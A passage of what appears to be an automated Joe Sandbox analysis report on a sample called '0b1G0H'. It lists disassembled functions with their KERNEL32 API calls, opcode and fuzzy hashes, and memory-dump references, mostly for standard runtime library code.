                                                                              • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                                              • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                                                              Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$FreeProcess
                                                                              • String ID:
                                                                              • API String ID: 3859560861-0
                                                                              • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                                              • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                                                              • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                                              • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                                                              Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                                                              • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                                                              • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: StringType$ByteCharMultiWide$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 319667368-0
                                                                              • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                                              • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                                                              • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                                              • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                                                              Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                                                              • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                                                                • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                                                              • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                                                              • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                                                              • String ID:
                                                                              • API String ID: 1390108997-0
                                                                              • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                                              • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                                                              • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                                              • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                                                              Function 00007FFE1A524CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                              • String ID: csm$csm$csm
                                                                              • API String ID: 3523768491-393685449
                                                                              • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                                              • Instruction ID: 079c67b0f2e08010973ab8f48eaa1003d0663a2f8cea6ef5d5fe8b4317e4721e
                                                                              • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                                              • Instruction Fuzzy Hash: 2DE17172A0CB81CAE7109BB6D4402BD7BB2FB46B68F1441B7DA8D57666DF38E485C700
                                                                              Function 00007FFE1A5295BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,?,00007FFE1A528BC9,?,?,?,?,00007FFE1A528C14), ref: 00007FFE1A5295CB
                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FFE1A528BC9,?,?,?,?,00007FFE1A528C14), ref: 00007FFE1A529601
                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FFE1A528BC9,?,?,?,?,00007FFE1A528C14), ref: 00007FFE1A52962E
                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FFE1A528BC9,?,?,?,?,00007FFE1A528C14), ref: 00007FFE1A52963F
                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FFE1A528BC9,?,?,?,?,00007FFE1A528C14), ref: 00007FFE1A529650
                                                                              • SetLastError.KERNEL32(?,?,?,00007FFE1A528BC9,?,?,?,?,00007FFE1A528C14), ref: 00007FFE1A52966B
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Value$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 2506987500-0
                                                                              • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                                              • Instruction ID: 45e22edf558f7288d3c6f8d8bd872cc2f3045da0add1de207b2616ab2857e100
                                                                              • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                                              • Instruction Fuzzy Hash: 10114A20B0CE42CAFA5863A3955113921A39F86FF0F4447F7E93E867F6DE2CB4418200
                                                                              Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 3326452711-0
                                                                              • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                                              • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                                                              • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                                              • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                                                              Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                                              • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                                                              • API String ID: 2984211723-1229430080
                                                                              • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                                              • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                                                              • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                                              • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                                                              Function 00007FFE1A527F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 4061214504-1276376045
                                                                              • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                                              • Instruction ID: 6e8816321cb52df19ad08d0513da84d0fd473d78a862bfb8ff8dadbd415df0eb
                                                                              • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                                              • Instruction Fuzzy Hash: F0F04F61B1DE06C1EA108B66A4443396321AF96BB1F5403F7DA6D466F4DF3CD089C340
                                                                              Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                                                              • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                                                              • ExitProcess.KERNEL32 ref: 0000000140008545
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: AddressExitHandleModuleProcProcess
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 75539706-1276376045
                                                                              • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                                              • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                                                              • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                                              • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                                                              Function 00007FFE1A5240D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustPointer
                                                                              • String ID:
                                                                              • API String ID: 1740715915-0
                                                                              • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                                              • Instruction ID: a8d1f601a07fa3ddddc74746fff1fb5068aa36f918cab99b45ab830b5339a662
                                                                              • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                                              • Instruction Fuzzy Hash: BDB18421B0DE42C1EA65DB97944023D6BB2AF56FA4F1584F7DA4D077A7DE3CE4418340
                                                                              Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: FileInfoSleepStartupType
                                                                              • String ID:
                                                                              • API String ID: 1527402494-0
                                                                              • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                                              • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                                                              • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                                              • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                                                              Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CommandLine$ByteCharErrorLastMultiWide
                                                                              • String ID:
                                                                              • API String ID: 3078728599-0
                                                                              • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                                              • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                                                              • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                                              • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                                                              Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                                              • String ID:
                                                                              • API String ID: 1850339568-0
                                                                              • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                                              • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                                                              • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                                              • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                                                              Function 00007FFE1A52FB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: _set_statfp
                                                                              • String ID:
                                                                              • API String ID: 1156100317-0
                                                                              • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                                              • Instruction ID: 7cc5675f0c6db86336fc35be1e3656e5f1646314ffe4d93083d4ad4f3bdec04c
                                                                              • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                                              • Instruction Fuzzy Hash: E411C832F0CE0B81F75811A7F56637912426F9BB70F1446F7E96F066FE8E2C68584101
                                                                              Function 00007FFE1A529684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FFE1A52766F,?,?,00000000,00007FFE1A52790A,?,?,?,?,?,00007FFE1A527896), ref: 00007FFE1A5296A3
                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FFE1A52766F,?,?,00000000,00007FFE1A52790A,?,?,?,?,?,00007FFE1A527896), ref: 00007FFE1A5296C2
                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FFE1A52766F,?,?,00000000,00007FFE1A52790A,?,?,?,?,?,00007FFE1A527896), ref: 00007FFE1A5296EA
                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FFE1A52766F,?,?,00000000,00007FFE1A52790A,?,?,?,?,?,00007FFE1A527896), ref: 00007FFE1A5296FB
                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FFE1A52766F,?,?,00000000,00007FFE1A52790A,?,?,?,?,?,00007FFE1A527896), ref: 00007FFE1A52970C
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID:
                                                                              • API String ID: 3702945584-0
                                                                              • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                                              • Instruction ID: a209664d1fe7bfcd29d2cb91a95bb7403b6922326ca985d40a84bf46d7e060d9
                                                                              • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                                              • Instruction Fuzzy Hash: A3113D20F0CA42C6FA5867A7656117961A35F86BF0F5847F7E93E867F6EE2CB4418200
                                                                              Function 00007FFE1A529518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID:
                                                                              • API String ID: 3702945584-0
                                                                              • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                                              • Instruction ID: de0ed7b0ffe09c7e4404dc978054de8924f921935b288f3c12813315b02bbcc4
                                                                              • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                                              • Instruction Fuzzy Hash: E411EC50B0DA07CAFA6966E3546117921A34F97BB0F540BF7E93E493F6DE2CB4418601
                                                                              Function 00007FFE1A525448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
